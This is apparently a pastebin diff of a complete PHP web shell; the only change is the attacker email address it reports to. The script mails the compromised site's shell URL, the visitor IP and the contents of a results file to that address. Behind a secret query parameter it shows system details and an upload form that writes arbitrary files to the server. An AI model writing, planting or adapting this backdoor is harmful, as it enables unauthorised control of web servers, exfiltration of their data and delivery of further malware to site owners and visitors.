SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | set_time_limit(0); | |
3 | error_reporting(0); | |
4 | $ss = $_SERVER['REMOTE_ADDR']; | |
5 | - | $to .= 'havij.exe@gmail.com'; |
5 | + | $to .= 'dexterdark@hotmail.com'; |
6 | $subject = 'Result Full FROM | '.$ss.''; | |
7 | $message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?sexter"."\r\n | |
8 | \n"."_________________________________". file_get_contents("resulte.txt") . "\n"; | |
9 | $headers = 'MIME-Version: 1.0' . "\r\n"; | |
10 | $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; | |
11 | $headers .= 'From: Dexter <localhost>' . "\r\n"; | |
12 | mail($to, $subject, $message, $headers); | |
13 | ||
14 | if(isset($_GET["sexter"])) | |
15 | { | |
16 | echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]"; | |
17 | print "\n";$disable_functions = @ini_get("disable_functions"); | |
18 | echo "DisablePHP=".$disable_functions; print "\n"; | |
19 | echo"<form method=post enctype=multipart/form-data>"; | |
20 | echo"<input type=file name=f><input name=v type=submit id=v value=up><br>"; | |
21 | if($_POST["v"]==up) | |
22 | { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} } | |
23 | ||
24 | ||
25 | ?> |